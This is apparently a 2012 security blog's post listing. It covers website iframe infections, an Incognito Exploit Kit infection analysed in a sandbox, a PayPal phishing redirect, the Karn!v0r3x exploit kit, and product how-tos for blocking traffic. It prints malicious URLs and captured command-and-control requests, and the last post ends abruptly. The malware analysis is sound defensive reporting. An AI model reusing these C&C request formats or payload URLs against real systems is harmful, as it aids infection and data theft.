NoVirusThanks Blog » Security News

Iframe Alias(dot)jjbworks(dot)com Mass Infection

admin — Tue, 31 Jan 2012 14:20:02 +0000

Another hidden and malicious iframe is spreading by infecting websites:

The iframe code is added before the BODY tag of the HTML page and is obfuscated:

The extracted malicious link is:

hxxp://alias .jjbworks .com/analytics.php

Details about the malicious domain:

Website: alias .jjbworks .com
Domain Hash: 2f8f518cb5d452fca78b8c11b3a53913
IP Address: 68.68.20.114 [SCAN]
IP Hostname: 68.68.20.114.customer.bluemilenetworks.com
IP Country: -- (--)
AS Number: 11013
AS Name: BLUE-AS - Bluemile, Inc

URLVoid report:

http://www.urlvoid.com/scan/alias.jjbworks.com

Websites infected with this malicious code:

sosumo .net

URLVoid report:

http://www.urlvoid.com/scan/sosumo.net

Iframe Bigdeal777(dot)com Mass Infection

admin — Tue, 31 Jan 2012 13:48:04 +0000

Internal honeypots have reported a lot of websites infected with a hidden and malicious iframe code that is added at the end of the HTML tag or before the BODY tag of the page, the malicious iframe looks like this:

Download the iframe code (pass is novirusthanks.org):

iframe.zip / 1 KB

Here is a small list of websites infected with this malicious code:

angelofdeath .pl
megavid .pl
invertus .lt
gelincikgiyim .de
ganacarne .com
strekowagora .cba .pl
nurevi .net
bijoux-fantaisie-online .com
f4c-test .1gb .ru
die-baurs .info
trenuje24 .pl
satalbak .com

Details about the malicious domain:

Website: bigdeal777 .com
Domain Hash: c87366528f961835580ae7c78f4a8903
IP Address: 178.63.141.211
IP Hostname: static.211.141.63.178.clients.your-server.de
IP Country: -- (--)
AS Number: 24940
AS Name: HETZNER-AS Hetzner Online AG RZ
Organization: serveradmin.pl S.C.

URLVoid report:

http://www.urlvoid.com/scan/bigdeal777.com

Preventsweating.com infected by Incognito Exploit Kit

admin — Tue, 31 Jan 2012 01:11:15 +0000

Our honeypot has logged an infected website:

hxxp://www.preventsweating .com

The malicious javascript code is at the end of the page:

Download dumped content (pass is novirusthanks.org):
exploit.zip / 1 KB

We have analyzed the infected website with our sandbox and we can see from the network traffic that the obfuscated javascript code redirects users to the Incognito Exploit Kit url that is used to exploit a Java vulnerability and to infect the user PC with the payload setup.exe.

The malicious Java file is downloaded:

GET /showthread.php?t=49281 HTTP/1.1
accept-encoding: pack200-gzip, gzip
content-type: application/x-java-archive
User-Agent: Mozilla/4.0 (Windows XP 5.1) Java/1.6.0_13
Host: pringcreek.osa .pl
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive
 
 
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 30 Jan 2012 23:39:19 GMT
Content-Type: application/java-archive
Connection: keep-alive
X-Powered-By: PHP/5.2.17
Content-Length: 11864
Content-Disposition: inline; filename=e7246650.jar
 
PK........Ó¸=@..

File details:

File: e7246650.jar
Size: 11864 bytes
MD5 Hash: 6CA56D1DF8E07747E3FCC2B090B784CF
SHA1 Hash: 1C71A325AA8A42633634084D6406816963848ADC
SHA256 Hash: 2B863CFD204781DB5EA4AD42AA39EF97DBC0D294DD13DC86904A04DE215B560A
SHA384 Hash: AF8B8A2FB3107A2EEDCC559A8E2AA4350FD8CBCDBA0E3D08B10AC9CD49A8002997812C9B2D1015E92F98A7A7779FA10A
SHA512 Hash: 4FB8AA0F57D5FF66922741295DF6E66825E18CCB6E182F94D5498C193611E2B1975BDE7C2FD7B70FFFF3323D45EAB4CF3132D696D9A3A42AE225E1DD58223A8B

Note that the .JAR file can be downloaded only using:

User-Agent: Mozilla/4.0 (Windows XP 5.1) Java/1.6.0_13

The payload is downloaded:

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 30 Jan 2012 23:39:21 GMT
Content-Type: application/octet-stream
Connection: keep-alive
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache
Pragma: no-cache
Accept-Ranges: bytes
Content-Transfer-Encoding: binary
Content-Length: 19968
Content-Disposition: inline; filename=setup.exe

File details:

File: setup.exe
Size: 19968 bytes
MD5 Hash: 53C8A9B30801AA54B91F2998BB541830
SHA1 Hash: 88AD96FE946428CF1784455F4A31D146236942CE
SHA256 Hash: 44FF06AA29B35E73CC31FBD63C02919C368EC967523E1C573047F4053561B313
SHA384 Hash: 812C0496FCAE403A4D541BEA5CBF5D5FC58A43BC872B1BC5C76DB1B76986502A57FF11104145EAF6F356BC089754BCAF
SHA512 Hash: 8184FD20E81CD4C0635F81518F53D7697A3412AA5C8B8F355EF739BFC1769E3DB0143344A109671C301D689CDDE7CE8581DC921E3808DFA81A4F9DFD349D73B6

Another malicious Java file is downloaded:

GET /showthread.php?t=49281 HTTP/1.1
User-Agent: Mozilla/4.0 (Windows XP 5.1) Java/1.6.0_13
Host: pringcreek.osa .pl
Connection: keep-alive
 
 
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 30 Jan 2012 23:39:15 GMT
Content-Type: application/java-archive
Connection: keep-alive
X-Powered-By: PHP/5.2.17
Content-Length: 11864
Content-Disposition: inline; filename=7c11db5a.jar

File details:

File: 7c11db5a.jar
Size: 16412 bytes
MD5 Hash: 45506395884D542068FCD39AB63157DD
SHA1 Hash: C8B351A83997D9EB5B0473072EA165949A94576C
SHA256 Hash: FF1A8129802655FD1E45A29B2329159A2AFC40BBCCB2AD2ED073C94ED228E98E
SHA384 Hash: 9B7A6C95D67A6BBBDAFB6C36552FF1A8E219A8298D76C8AE379F5CDA96391D2AC6B3733FF26032DCE99DC3355AC75284
SHA512 Hash: 0CDC120ADF5A425611880FCB86ACD34F2BC79B7F5CF354E71A43D2EBAFCCAD3D78E6373CB5073CA71C695C71392D26640E231C6FFFCC4E01207173971F47F043

Other HTTP GET requests:

GET /net.class HTTP/1.1
User-Agent: Mozilla/4.0 (Windows XP 5.1) Java/1.6.0_13
Host: pringcreek.osa .pl
 
GET /edu.class HTTP/1.1
User-Agent: Mozilla/4.0 (Windows XP 5.1) Java/1.6.0_13
Host: pringcreek.osa .pl
 
GET /com.class HTTP/1.1
User-Agent: Mozilla/4.0 (Windows XP 5.1) Java/1.6.0_13
Host: pringcreek.osa .pl

An executable file is downloaded (and executed) from the C&C server:

GET /cc/index.php?cmd=getload&login=72F46C46959F9B3F2&file=0&sel=77777 HTTP/1.1
Host: hotlupdate .ru
 
HTTP/1.1 200 OK
Date: Mon, 30 Jan 2012 23:38:47 GMT
Server: Apache/2.2.21 (CentOS)
X-Powered-By: PHP/5.3.9
Cache-Control: public
Content-Disposition: attachment; filename=243
Content-Transfer-Encoding: binary
Content-Length: 218112
Connection: close
Content-Type: application/octet-stream
 
MZ.........ÿÿ..

The malware sends data (run=ok) to the C&C server:

GET /cc/index.php?cmd=getload&login=72F46C46959F9B3F2&file=0&sel=77777&run=ok HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: hotlupdate .ru

The malware retrieves other commands from the C&C server:

POST /cc/index.php HTTP/1.0
Host: hotlupdate .ru
User-Agent: Mozilla/4.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 38
 
cmd=grab&data=&login=72F46C46959F9B3F2

And:

GET /cc/index.php?cmd=getload&login=72F46C46959F9B3F2&file=1&sel=77777 HTTP/1.1
GET /cc/index.php?cmd=getload&login=72F46C46959F9B3F2&file=2&sel=77777 HTTP/1.1
GET /cc/index.php?cmd=getload&login=72F46C46959F9B3F2&file=3&sel=77777 HTTP/1.1
GET /cc/index.php?cmd=getload&login=72F46C46959F9B3F2&file=4&sel=77777 HTTP/1.1
GET /cc/index.php?cmd=getload&login=72F46C46959F9B3F2&file=5&sel=77777 HTTP/1.1
GET /cc/index.php?cmd=getload&login=72F46C46959F9B3F2&file=6&sel=77777 HTTP/1.1
GET /cc/index.php?cmd=getload&login=72F46C46959F9B3F2&file=7&sel=77777 HTTP/1.1
GET /cc/index.php?cmd=getload&login=72F46C46959F9B3F2&file=8&sel=77777 HTTP/1.1

Another file is downloaded from the Incognito Exploit Kit URL:

GET /showthread.php?t=132357 HTTP/1.1
User-Agent: User-Agent: Opera/10.60 Presto/2.2.30
Host: pringcreek.osa .pl
Cache-Control: no-cache
 
 
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 30 Jan 2012 23:41:01 GMT
Content-Type: application/octet-stream
Connection: keep-alive
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache
Pragma: no-cache
Accept-Ranges: bytes
Content-Transfer-Encoding: binary
Content-Length: 847872
Content-Disposition: inline; filename=windows-update-sp4-kb76758-setup.exe

Then we can see network traffic on the remote TCP port 34356:

Remote Address    : 69.142.195.117
Remote Port       : 34354
Packets           : 8
Data Size         : 2.140 Bytes
Total Size        : 2.520 Bytes
 
Remote Address    : 69.14.13.29
Remote Port       : 34354
Packets           : 8
Data Size         : 2.140 Bytes
Total Size        : 2.520 Bytes
 
Remote Address    : 99.101.74.204
Remote Port       : 34354
Packets           : 8
Data Size         : 2.140 Bytes
Total Size        : 2.520 Bytes
 
Remote Address    : 76.117.36.145
Remote Port       : 34354
Packets           : 8
Data Size         : 2.140 Bytes
Total Size        : 2.520 Bytes

We can see a connection to the legit maxmind.com service:

GET /app/geoip.js HTTP/1.0
Host: j.maxmind .com
Connection: close

The request is used to grab details about the victom’s IP address.

Another connection:

GET /geo/txt/city.php HTTP/1.0
Host: promos.fling .com
Connection: close

And now the malware starts to visit porn websites:

GET /gabi/s.php?id=103 HTTP/1.1
Host: phatcutie .com
 
GET /images/b.php?id=103 HTTP/1.1
Host: oneathleticmom .com

Here there is the (partial) extracted sandbox activity:

Web Request - %ProgramFiles%\Java\jre6\bin\java.exe - GET - pringcreek.osa .pl - /showthread.php?t=49281
Web Request - %ProgramFiles%\Java\jre6\bin\java.exe - GET - pringcreek.osa .pl - /showthread.php?t=83475
File Modified - %ProgramFiles%\Java\jre6\bin\java.exe - %AppData%\LOCALS~1\Temp\jar_cache398678090053612628.tmp
File Modified - %ProgramFiles%\Java\jre6\bin\java.exe - %AppData%\LOCALS~1\Temp\jar_cache1046982269622246314.tmp
File Created - %ProgramFiles%\Java\jre6\bin\java.exe - %Temp%\jar_cache398678090053612628.tmp - 45506395884D542068FCD39AB63157DD - 16412 bytes - attr: [] - -
File Created - %ProgramFiles%\Java\jre6\bin\java.exe - %Temp%\jar_cache1046982269622246314.tmp - 6CA56D1DF8E07747E3FCC2B090B784CF - 11864 bytes - attr: [] - -
File Created - %ProgramFiles%\Java\jre6\bin\java.exe - %Temp%\jar_cache398678090053612628.tmp - 45506395884D542068FCD39AB63157DD - 16412 bytes - attr: [-normal] - -
File Created - %ProgramFiles%\Java\jre6\bin\java.exe - %Temp%\jar_cache1046982269622246314.tmp - 6CA56D1DF8E07747E3FCC2B090B784CF - 11864 bytes - attr: [-normal] - -
Web Request - %ProgramFiles%\Java\jre6\bin\java.exe - GET - pringcreek.osa .pl - /com.class
Web Request - %ProgramFiles%\Java\jre6\bin\java.exe - GET - pringcreek.osa .pl - /showthread.php?t=2
Web Request - %ProgramFiles%\Java\jre6\bin\java.exe - GET - pringcreek.osa .pl - /edu.class
File Modified - %ProgramFiles%\Java\jre6\bin\java.exe - %AppData%\LOCALS~1\Temp\jar_cache6018828398565894530.tmp
File Modified - %ProgramFiles%\Java\jre6\bin\java.exe - %AppData%\LOCALS~1\Temp\jika0.22284718957661265.exe
Web Request - %ProgramFiles%\Java\jre6\bin\java.exe - GET - pringcreek.osa .pl - /net.class
File Created - %ProgramFiles%\Java\jre6\bin\java.exe - %Temp%\jar_cache6018828398565894530.tmp - 55A6E2B19CEE1FA1FD88D6949451B111 - 7839 bytes - attr: [] - -
File Created - %ProgramFiles%\Java\jre6\bin\java.exe - %Temp%\jar_cache6018828398565894530.tmp - 55A6E2B19CEE1FA1FD88D6949451B111 - 7839 bytes - attr: [-normal] - -
File Created - %ProgramFiles%\Java\jre6\bin\java.exe - %Temp%\jika0.22284718957661265.exe - F33E22CD5DF84623F90E4248602B6BB8 - 3743 bytes - attr: [] - -
Web Request - %ProgramFiles%\Java\jre6\bin\java.exe - GET - pringcreek.osa .pl - /org.class
Web Request - %ProgramFiles%\Java\jre6\bin\java.exe - GET - pringcreek.osa .pl - /showthread.php?t=3
File Deleted - %ProgramFiles%\Java\jre6\bin\java.exe - %Temp%\jar_cache6018828398565894530.tmp - 19968 bytes
File Modified - %ProgramFiles%\Java\jre6\bin\java.exe - %AppData%\LOCALS~1\Temp\jar_cache482471531546092118.tmp
File Modified - %ProgramFiles%\Java\jre6\bin\java.exe - %AppData%\LOCALS~1\Temp\oleda0.465072127781617.exe
File Created - %ProgramFiles%\Java\jre6\bin\java.exe - %AppData%\Sun\Java\Deployment\cache\6.0\7\6e422d47-1d1e469a-temp - NOTHING TO HASH - 0 bytes - attr: [] - -
File Created - %ProgramFiles%\Java\jre6\bin\java.exe - %AppData%\Sun\Java\Deployment\cache\6.0\lastAccessed - 5058F1AF8388633F609CADB75A75DC9D - 1 bytes - attr: [] - -
File Created - %ProgramFiles%\Java\jre6\bin\java.exe - %Temp%\jar_cache482471531546092118.tmp - 253355E476CBBD461359962E8011B601 - 7839 bytes - attr: [] - -
File Created - %ProgramFiles%\Java\jre6\bin\java.exe - %Temp%\jar_cache482471531546092118.tmp - 253355E476CBBD461359962E8011B601 - 11935 bytes - attr: [-normal] - -
File Created - %ProgramFiles%\Java\jre6\bin\java.exe - %Temp%\oleda0.465072127781617.exe - 55A6E2B19CEE1FA1FD88D6949451B111 - 7839 bytes - attr: [] - -
Process Created - %ProgramFiles%\Java\jre6\bin\java.exe - %Temp%\jika0.22284718957661265.exe - Twain Working Group - 517218B3A72016EE04208AAED408240F - 19968 bytes
Process Created - %ProgramFiles%\Java\jre6\bin\java.exe - C:\WINDOWS\system32\regsvr32.exe - Microsoft Corporation - FBDB9D0935B9907B809B381FDDF1627F - 11776 bytes
File Deleted - %ProgramFiles%\Java\jre6\bin\java.exe - %Temp%\jar_cache482471531546092118.tmp - 19968 bytes
Process Created - %ProgramFiles%\Java\jre6\bin\java.exe - %Temp%\oleda0.465072127781617.exe - Twain Working Group - 517218B3A72016EE04208AAED408240F - 19968 bytes
Connection Established - %Temp%\jika0.22284718957661265.exe - TCP - 95.163.67.189 - 80
Web Request - %Temp%\jika0.22284718957661265.exe - GET - pringcreek.osa .pl - /showthread.php?t=132357
File Modified - %Temp%\jika0.22284718957661265.exe - %AppData%\LOCALS~1\Temp\~!#3.tmp
File Created - %Temp%\jika0.22284718957661265.exe - %Temp%\~!#3.tmp - 735C39079BF4B1E4A94F53B1CD8D4B8D - 24576 bytes - attr: [-hidden] - PE
File Created - %Temp%\jika0.22284718957661265.exe - %Temp%\~!#4.tmp - B8BDF98CC3830AEAB62C5AF7C8DB21E6 - 338470 bytes - attr: [-normal] - PE
Process Created - %Temp%\~!#3.tmp - C:\WINDOWS\system32\svchost.exe - Microsoft Corporation - 27C6D03BCDB8CFEB96B716F3D8BE3E18 - 14336 bytes
File Deleted - C:\WINDOWS\system32\svchost.exe - %Temp%\~!#3.tmp - 24576 bytes
Process Created - %Temp%\jika0.22284718957661265.exe - %Temp%\~!#4.tmp - Unknown Publisher - B8BDF98CC3830AEAB62C5AF7C8DB21E6 - 338470 bytes
Connection Established - C:\WINDOWS\system32\svchost.exe - TCP - 91.196.216.58 - 80
Web Request - C:\WINDOWS\system32\svchost.exe - GET - hotlupdate .ru - /cc/index.php?cmd=getgrab
Web Request - C:\WINDOWS\system32\svchost.exe - GET - hotlupdate .ru - /cc/index.php?cmd=getload&login=72F46C46959F9B3F2&file=0&sel=77777
File Modified - C:\WINDOWS\system32\svchost.exe - %AppData%\LOCALS~1\Temp\5.tmp
File Created - C:\WINDOWS\system32\svchost.exe - %InternetCache%\Content.IE5\8YPELNXD\243[1] - 0DC10D843DADB4CBAE7B31B126F89567 - 191225 bytes - attr: [] - PE
Process Created - C:\WINDOWS\system32\svchost.exe - %Temp%\5.tmp - Unknown Publisher - 04E875E00F55525199B0952660580A80 - 218112 bytes
Web Request - C:\WINDOWS\system32\svchost.exe - GET - hotlupdate .ru - /cc/index.php?cmd=getload&login=72F46C46959F9B3F2&file=0&sel=77777&run=ok
Web Request - C:\WINDOWS\system32\svchost.exe - POST - hotlupdate .ru - /cc/index.php
Web Request - C:\WINDOWS\system32\svchost.exe - GET - hotlupdate .ru - /cc/index.php?cmd=getload&login=72F46C46959F9B3F2&file=1&sel=77777
Web Request - C:\WINDOWS\system32\svchost.exe - GET - hotlupdate .ru - /cc/index.php?cmd=getload&login=72F46C46959F9B3F2&file=2&sel=77777
File Deleted - C:\WINDOWS\system32\svchost.exe - %Temp%\7.tmp - 0 bytes
File Created - C:\WINDOWS\system32\svchost.exe - %InternetCache%\Content.IE5\G55SBTS1\index[1].htm - NOTHING TO HASH - 0 bytes - attr: [] - -
File Created - C:\WINDOWS\system32\svchost.exe - %Temp%\8.tmp - NOTHING TO HASH - 0 bytes - attr: [] - -
Web Request - C:\WINDOWS\system32\svchost.exe - GET - hotlupdate .ru - /cc/index.php?cmd=getload&login=72F46C46959F9B3F2&file=3&sel=77777
File Deleted - C:\WINDOWS\system32\svchost.exe - %Temp%\8.tmp - 0 bytes
File Created - C:\WINDOWS\system32\svchost.exe - %InternetCache%\Content.IE5\8YPELNXD\index[1].htm - NOTHING TO HASH - 0 bytes - attr: [] - -
File Created - C:\WINDOWS\system32\svchost.exe - %Temp%\9.tmp - NOTHING TO HASH - 0 bytes - attr: [] - -
Web Request - C:\WINDOWS\system32\svchost.exe - GET - hotlupdate .ru - /cc/index.php?cmd=getload&login=72F46C46959F9B3F2&file=4&sel=77777
File Deleted - C:\WINDOWS\system32\svchost.exe - %Temp%\9.tmp - 0 bytes
File Created - C:\WINDOWS\system32\svchost.exe - %InternetCache%\Content.IE5\VBPHH91D\index[2].htm - NOTHING TO HASH - 0 bytes - attr: [] - -
File Created - C:\WINDOWS\system32\svchost.exe - %Temp%\A.tmp - NOTHING TO HASH - 0 bytes - attr: [] - -
Web Request - C:\WINDOWS\system32\svchost.exe - GET - hotlupdate .ru - /cc/index.php?cmd=getload&login=72F46C46959F9B3F2&file=5&sel=77777
File Deleted - C:\WINDOWS\system32\svchost.exe - %Temp%\A.tmp - 0 bytes
File Created - C:\WINDOWS\system32\svchost.exe - %InternetCache%\Content.IE5\Q96OL02U\index[2].htm - NOTHING TO HASH - 0 bytes - attr: [] - -
File Created - C:\WINDOWS\system32\svchost.exe - %Temp%\B.tmp - NOTHING TO HASH - 0 bytes - attr: [] - -
Web Request - C:\WINDOWS\system32\svchost.exe - GET - hotlupdate .ru - /cc/index.php?cmd=getload&login=72F46C46959F9B3F2&file=6&sel=77777
File Deleted - C:\WINDOWS\system32\svchost.exe - %Temp%\B.tmp - 0 bytes
Process Created - %Temp%\5.tmp - C:\WINDOWS\system32\cmd.exe - Microsoft Corporation - 6D778E0F95447E6546553EEEA709D03C - 389120 bytes
File Created - C:\WINDOWS\system32\svchost.exe - %InternetCache%\Content.IE5\G55SBTS1\index[2].htm - NOTHING TO HASH - 0 bytes - attr: [] - -
File Created - C:\WINDOWS\system32\svchost.exe - %Temp%\C.tmp - NOTHING TO HASH - 0 bytes - attr: [] - -
Web Request - C:\WINDOWS\system32\svchost.exe - GET - hotlupdate .ru - /cc/index.php?cmd=getload&login=72F46C46959F9B3F2&file=7&sel=77777
File Deleted - C:\WINDOWS\system32\cmd.exe - %Temp%\5.tmp - 218112 bytes
File Deleted - C:\WINDOWS\system32\svchost.exe - %Temp%\C.tmp - 0 bytes
File Created - C:\WINDOWS\system32\svchost.exe - %InternetCache%\Content.IE5\8YPELNXD\index[2].htm - NOTHING TO HASH - 0 bytes - attr: [] - -
File Created - C:\WINDOWS\system32\svchost.exe - %Temp%\D.tmp - NOTHING TO HASH - 0 bytes - attr: [] - -
Web Request - C:\WINDOWS\system32\svchost.exe - GET - hotlupdate .ru - /cc/index.php?cmd=getload&login=72F46C46959F9B3F2&file=8&sel=77777
File Deleted - C:\WINDOWS\system32\svchost.exe - %Temp%\D.tmp - 0 bytes
File Created - C:\WINDOWS\system32\svchost.exe - %InternetCache%\Content.IE5\VBPHH91D\index[3].htm - NOTHING TO HASH - 0 bytes - attr: [] - -
File Created - C:\WINDOWS\system32\svchost.exe - %Temp%\E.tmp - NOTHING TO HASH - 0 bytes - attr: [] - -
Web Request - C:\WINDOWS\system32\svchost.exe - GET - hotlupdate .ru - /cc/index.php?cmd=getload&login=72F46C46959F9B3F2&file=9&sel=77777
File Deleted - C:\WINDOWS\system32\svchost.exe - %Temp%\E.tmp - 0 bytes
File Created - C:\WINDOWS\system32\svchost.exe - %InternetCache%\Content.IE5\Q96OL02U\index[3].htm - NOTHING TO HASH - 0 bytes - attr: [] - -
File Modified - %Temp%\jika0.22284718957661265.exe - %AppData%\LOCALS~1\Temp\~!#F.tmp
File Created - %Temp%\jika0.22284718957661265.exe - %Temp%\~!#F.tmp - A2B9D4D024C8BF19908E4775C34C53F5 - 847872 bytes - attr: [-hidden] - PE
File Created - %Temp%\jika0.22284718957661265.exe - %Temp%\~!#F.tmp - A2B9D4D024C8BF19908E4775C34C53F5 - 847872 bytes - attr: [-normal] - PE
Process Created - %Temp%\jika0.22284718957661265.exe - %Temp%\~!#F.tmp - Unknown Publisher - A2B9D4D024C8BF19908E4775C34C53F5 - 847872 bytes
File Modified - %Temp%\~!#F.tmp - %AppData%\LOCALS~1\Temp\10.tmp
File Created - %Temp%\~!#F.tmp - %Temp%\10.tmp - NOTHING TO HASH - 0 bytes - attr: [] - -
File Created - %Temp%\~!#F.tmp - %AllUsersAppData%\isecurity - NOTHING TO HASH - 0 bytes - attr: [] - -
Process Created - %Temp%\~!#F.tmp - %AllUsersAppData%\isecurity.exe - Unknown Publisher - 58973908409767BF798936B2234CAAA6 - 840192 bytes
File Created - %Temp%\~!#F.tmp - %AllUsersDesktop%\Internet Security.lnk - A834D65A0129456792F9D08F2719781B - 794 bytes - attr: [] - -
Connection Established - %Temp%\~!#F.tmp - TCP - 174.133.57.114 - 80
Web Request - %Temp%\~!#F.tmp - GET - phatcutie .com - /gabi/s.php?id=103
Connection Established - %Temp%\~!#F.tmp - TCP - 72.167.207.74 - 80
Web Request - %Temp%\~!#F.tmp - GET - oneathleticmom .com - /images/b.php?id=103
File Created - %AppData%\LOCALS~1\Temp\~!#F.tmp - %Temp%\11.tmp - A2B9D4D024C8BF19908E4775C34C53F5 - 847872 bytes - attr: [] - PE

From the report we can see it is installed the rogue security software named “Internet Security”, the malicious executable file is dropped in the %AllUsersAppData% with the name isecurity.exe:

Process Created - %Temp%\~!#F.tmp - %AllUsersAppData%\isecurity.exe - Unknown Publisher - 58973908409767BF798936B2234CAAA6 - 840192 bytes

Phishing: Update your PayPal account Information

admin — Mon, 16 Jan 2012 02:01:26 +0000

We have detected new phishing emails with subject “Update your PayPal account Information” that contain fake PayPal link that redirects to a phishing page used to steal PayPal account details of users that type their credentials.

Email header:

Subject: Update your PayPal account Information
Date: Mon, 16 Jan 2012 00:43:26 +0100
Received: from WIN-QJ6LOAE77N1 (unknown [109.169.70.227])

The malicious link is:

hxxp://technologyprojects. org/wp-rss.php

That redirects to:

HTTP/1.1 302 Moved Temporarily
Date: Mon, 16 Jan 2012 01:08:28 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Location: hxxp://paypal.com-us.cgi-bin-webscr-cmd.login-submit-dispatch.74fghghs68g484iky4mn86we8r46d4h38df4b83m48hg3ui4ty84s83f4xcb78.norenterprises .com/us/webser/us
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html

Note the long subdomain name that begins with “paypal.com”:

paypal.com-us.cgi-bin-webscr-cmd.login-submit-dispatch.74fghghs68g484iky4mn86we8r46d4h38df4b83m48hg3ui4ty84s83f4xcb78.norenterprises. com

The ip address of the malicious domain is:

67.220.209.21 / server23.verygoodserver.com

Block malicious PDF files with Socket Sentinel Pro

admin — Wed, 11 Jan 2012 20:22:15 +0000

We will use Socket Sentinel Pro to block the download of malicious PDF files that contain javascript code. With this method we can block web exploit kits that spread PDF files containing malicious javascript code, example: Blackhole Exploit Kit.

NoVirusThanks Socket Sentinel Pro is an advanced, yet user-friendly, bi-directional TCP traffic filtering software application which allows you to add custom RegEx (Regular Expression) filters. Presets for filtering include: HTTP header information, POST and GET data, Domain Names or even filter for *ANY* data passed over any connection. Read more…

1) Set needed option

Open Socket Sentinel Pro and browse to:

Rules -> Downloads

Enable the option “Block download of PDF files with JavaScript code”.

2) Testing

Now if we try to visit an infected website that is hosting the blackhole exploit kit, we will see that the download of the malicious PDF file will be blocked by Socket Sentinel Pro because the PDF file contain javascript code:

The malicious website:

hxxp://xwjbmmp.dhcp. biz/content/fdp1.php?f=19

Has been successfully blocked, see also the Events TAB:

Block websites by TLD with Socket Sentinel Pro

admin — Wed, 11 Jan 2012 20:05:37 +0000

We will use Socket Sentinel Pro to set a pre-defined list of blacklisted TLDs to block domains. With this method we can block TLDs mostly used by web exploit kits, such as .co.cc, .co.nz and others, or we can simply block the user to visit websites with specific TLDs.

NoVirusThanks Socket Sentinel Pro is an advanced, yet user-friendly, bi-directional TCP traffic filtering software application which allows you to add custom RegEx (Regular Expression) filters. Presets for filtering include: HTTP header information, POST and GET data, Domain Names or even filter for *ANY* data passed over any connection. Read more…

1) Add blacklisted TLDs

Open Socket Sentinel Pro and browse to:

Rules -> TLDs

There is a list of TLDs that are blacklisted, and so that will be blocked. To add a new TLD to be blocked, right-click with the mouse and click on the “Add” button.

2) Testing

Now we can test Socket Sentinel Pro, we will try to visit a website infected with an exploit kit that has a TLD present in our blacklisted list of TLDs:

Result is as expected, the website has been blocked, see also Events TAB:

Limit users to visit only specific websites with Socket Sentinel Pro v1.4

admin — Wed, 11 Jan 2012 19:44:31 +0000

We will use Socket Sentinel Pro to set a pre-defined list of websites that the user will be able to visit and all the other websites that the user will try to visit, will be blocked automatically.

NoVirusThanks Socket Sentinel Pro is an advanced, yet user-friendly, bi-directional TCP traffic filtering software application which allows you to add custom RegEx (Regular Expression) filters. Presets for filtering include: HTTP header information, POST and GET data, Domain Names or even filter for *ANY* data passed over any connection. Read more…

1) Add whitelisted domains

Open Socket Sentinel Pro and browse to:

Rules -> Domains -> Whitelist

As you can see from this screenshot:

There is a list of domains, that will be allowed to be visited. All unknown domains, and so that are not present in this list, will be automatically blocked. To add a new domain, right-click with the mouse and click on “Add” button.

2) Enable needed option

Now always on Socket Sentinel Pro, browse to:

Settings -> General

And enable the option “Block all unknown websites”, as shown in this image:

3) Testing

All the needed settings are now set correctly, and you can test Socket Sentinel Pro. If you try to visit with a web browser an unknown website, for example bing.com, the connection will be blocked and the user will be unable to visit the (unknown) website:

To remove the alert popup window, browse to:

Settings -> Popup

Uncheck the option “Show a popup window when a connection is blocked”:

On the “Events” TAB, we can see the blocked websites:

This is a good method to lock the user to visit only our pre-defined list of websites, for example, if the user is at work we can make sure to allow his navigation only to work-related websites, or we can make sure that our childrens do not browse malicious or pornographic websites. This method can be used to block unknown websites, and so block browsing of possible dangerous and infected websites.

Karn!v0r3x v1.0 Exploit Kit

admin — Sat, 07 Jan 2012 21:49:28 +0000

There is a new exploit kit in the wild, this time named Karn!v0r3x v1.0:

Html code of the login page:



Karn!v0r3x v1.0 [Inicio]| Malandrines .n3t




	
		
		
			
 
				Username:
 
				
			
			
				Password: 

				
			
				
 
		
		
 
		
			Karn!v0r3x v1.0 | Malandrines .n3t [2011]

Sniffed traffic during trying some logins:

POST /imagenes_noticias/ HTTP/1.1
Host: alertas .gob.mx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.2.25) Gecko/20111212 Firefox/3.6.25
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-gb,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: hxxp://www.alertas .gob.mx/imagenes_noticias/
Content-Type: application/x-www-form-urlencoded
Content-Length: 27
 
user=username&pass=password

Screenshots of the content of some directories:

hxxp://www.alertas .gob.mx/imagenes_noticias/files/

hxxp://www.alertas .gob.mx/imagenes_noticias/files/os/

The file net4.exe looks like to be the legit file of .NET 4.0:

File: net4_exe
Size: 889416 bytes
MD5 Hash: 53406E9988306CBD4537677C5336ABA4
SHA1 Hash: 06BECADB92A5FCCA2529C0B93687C2A0C6D0D610
SHA256 Hash: FA1AFFF978325F8818CE3A559D67A58297D9154674DE7FD8EB03656D93104425
SHA384 Hash: FAA596D827BB04DAD53CFB921047BA07916BA78754EBDF00A5DF1BEE69594512DDD9E5F6F1C76D6B82EE3576E4CDA40F
SHA512 Hash: 4F89DA81B5A3800AA16FF33CC4A42DBB17D4C698A5E2983B88C32738DECB57E3088A1DA444AD0EC0D745C3C6B6B8B9B86D3F19909142F9E51F513748C0274A99

Location of the executable file is:

hxxp://www.alertas .gob.mx/imagenes_noticias/files/net4.exe

If we query the bot.php file as follow:

hxxp://www.alertas .gob.mx/imagenes_noticias/bot.php?b=sites

We get a list of websites (titles?) as seen in this image:

Most probably the banking trojan that is distributed with this exploit kit monitors for the page title of web browsers, and if matched the title it starts to capture details of banking transactions to steal the account details.

List of known paths related to this exploit kit:

/index.php
/bot.php?b=sites
/bot.php?b=save
/bot.php?b=show
/bot.php?b=id
/bot.php?b=savesites
/files/
/files/os/
/files/capturas/
/files/downloads/
/files/geoip.dat
/files/geoip.inc
/files/karni.jpg
/files/paises/
/files/net4.exe

The infected machine communicate with the C&C server as this:

